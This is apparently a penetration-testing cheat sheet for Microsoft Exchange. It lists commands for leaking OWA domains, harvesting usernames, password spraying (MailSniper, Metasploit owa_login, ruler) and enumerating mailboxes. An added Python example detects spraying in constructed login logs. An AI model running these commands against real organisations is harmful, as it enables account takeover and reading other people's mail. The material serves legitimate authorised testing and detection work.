Exchange

OWA - Leak domain, obtain email addresses and password spray

1. Find a service to spray

OWA is generally located at mail.target.com or target.com/owa

2. Obtain the domain name

Look for a domain leak

use auxiliary/scanner/http/owa_login

Guess the domain based on response time

Invoke-DomainHarvestOWA -ExchHostname <target.com/owa> -DomainList <domain_guessing_list.txt> -OutFile <potential_domains.txt>

3. Obtain email addresses

See OSINT

These tools can validate full credentials, or confirm only the login when the password is wrong but the username exists.

use auxiliary/scanner/http/owa_login
Invoke-UsernameHarvestOWA -ExchHostname <target.com/owa> -UserList <user_list.txt> -Domain <target.local> -OutFile <potential_usernames.txt>

4. Password spray

use auxiliary/scanner/http/owa_login
Invoke-PasswordSprayOWA -ExchHostname <target.com/owa> -userlist <user_list.txt> -Domain <target.local> -password <Winter2020>

MAPI over HTTP

Password spray
./ruler-linux64 -k --url https://autodiscover.<domain.int>/autodiscover/autodiscover.xml brute --users /tmp/user.txt --passwords /tmp/passwords.txt
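
Defender-side view of the spraying described in the OWA and MAPI over HTTP sections, as an added example that is not part of the original page: a spray appears as one source failing authentication for many accounts with only a try or two per account. The log layout, sample records, thresholds and function names are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records: timestamp, source IP, username, result.
SAMPLE_LOG = """\
2020-01-13T09:00:01 203.0.113.50 TARGET\\alice FAIL
2020-01-13T09:00:03 203.0.113.50 TARGET\\bob FAIL
2020-01-13T09:00:05 203.0.113.50 TARGET\\carol FAIL
2020-01-13T09:00:07 203.0.113.50 TARGET\\dave OK
2020-01-13T09:00:09 203.0.113.50 TARGET\\erin FAIL
2020-01-13T09:00:11 203.0.113.50 TARGET\\frank FAIL
2020-01-13T09:05:00 198.51.100.7 TARGET\\grace FAIL
2020-01-13T09:05:20 198.51.100.7 TARGET\\grace FAIL
2020-01-13T09:05:40 198.51.100.7 TARGET\\grace OK
"""


def parse(text):
    """Turn each line into (datetime, ip, user, succeeded)."""
    events = []
    for line in text.splitlines():
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result == "OK"))
    return events


def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Flag IPs that fail logins for many users with few tries per user."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        fails = [(t, u) for t, _, u, ok in evs if not ok]
        for end_time, _ in fails:
            # Failed attempts inside the window that ends at this event.
            tries = Counter(u for t, u in fails if end_time - window <= t <= end_time)
            if len(tries) >= min_users and max(tries.values()) <= max_per_user:
                # A success from a spraying source marks an account to reset first.
                hits = sorted({u for _, _, u, ok in evs if ok})
                findings[ip] = {"users_tried": len(tries), "compromised": hits}
                break
    return findings


if __name__ == "__main__":
    print(detect_spray(parse(SAMPLE_LOG)))
```

The second source in the sample, a single user mistyping a password, is not flagged because it touches only one account.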

Mailbox rights review - MailSniper

1. Get global address list (OWA)

Get-GlobalAddressList -ExchHostname <mail.domain.int> -username <domain>\<user> -Password "<password>" -outfile global-address-list.txt

2. Dump mailbox access rights (EWS)

Invoke-OpenInboxFinder -EmailList .\global-address-list.txt -Remote -ExchHostname <mail.domain.int>

3. Search for keywords in inbox

Invoke-SelfSearch -Mailbox <user@domain.int> -Remote -ExchHostname <mail.domain.int>